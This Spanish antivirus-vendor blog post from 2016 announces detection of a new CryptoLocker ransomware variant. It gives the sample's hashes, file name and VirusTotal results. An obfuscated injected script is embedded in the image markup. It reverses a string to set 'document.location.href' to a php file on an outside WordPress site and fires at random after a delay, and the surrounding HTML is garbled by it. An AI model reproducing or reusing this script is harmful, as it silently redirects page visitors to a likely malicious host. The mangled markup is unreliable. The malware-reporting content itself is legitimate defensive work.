NUEVO ICONO PARA FICHEROS DE NUEVAS VARIANTES DE RANSOMWARE CRYPTOLOCKER
Aunque el nombre sea pequeña variante de los ya conocidos ultimamente, el icono lo van cambiando, como parece que ahora hacen con las últimas muestras recibidas. En esta ocasión aparenta ser un icono de downloader, para pasar desapercibido, como los anteriores recientes de instalacion, o de Adobe, ademas del de una carpeta tipica en muchos anteriores a estos ùltimos:
tolocker/” rel=”attachment wp-att-68840″>{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tolocker.jpg” alt=”diferentes iiconos del cryp<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
tolocker” width=”480″ height=”114″ />
A partir del ELISTARA 34.36 de hoy pasamos a controlar esta nueva variante de ransomware, aun poco detectado por los actuales AV.
El preanalisis de virustotal ofrece el siguiente informe:
MD5 2048dc67e51ce3a1d0c79cd82dfc5d36
SHA1 3bb79c5a06f6476cd61adfb889283384aeeff447
Tamaño del fichero 368.7 KB ( 377502 bytes )
SHA256: 55176852140cc8e44f9337f933e913e0636974aee0722b5db1cbcddc7b7af138
Nombre: informacion_16953.exe
Detecciones: 3 / 57
Fecha de análisis: 2016-04-18 07:42:41 UTC ( hace 0 minutos )
0 1
Antivirus Resultado Actualización
McAfee-GW-Edition BehavesLike.Win32.Dropper.fc 20160418
Qihoo-360 HEUR/QVM42.1.Malware.Gen 20160418
Sophos Mal/Generic-S 20160418
Dicha versión del ELISTARA 34.36 que lo detecta y elimina, estará disponible en nuestra web a partir de las 18 h CEST de hoy
saludos
ms, 18-4-2016
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.